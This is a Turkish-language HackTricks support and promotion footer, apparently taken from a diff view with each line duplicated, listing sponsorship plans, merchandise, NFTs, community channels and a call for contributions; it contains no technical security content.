||||
HackTricks'ı desteklemenin diğer yolları:
|
||||
HackTricks'i desteklemenin diğer yolları:
|
||||
|
||||
* **Şirketinizi HackTricks'te reklamınızı görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
|
||||
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
|
||||
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
|
||||
* [**The PEASS Family'yi**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
|
||||
* **💬 [Discord grubuna](https://discord.gg/hRep4RUj7f) veya [telegram grubuna](https://t.me/peass) katılın veya** bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)** takip edin.**
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'yi keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuzu
|
||||
* **💬 [Discord grubuna](https://discord.gg/hRep4RUj7f) veya [telegram grubuna](https://t.me/peass) katılın veya** bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)'da takip edin.
|
||||
* **Hacking püf noktalarınızı paylaşarak PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
|
||||
|
||||
</details>
|
||||
|
|
Loading…
Add table
Reference in a new issue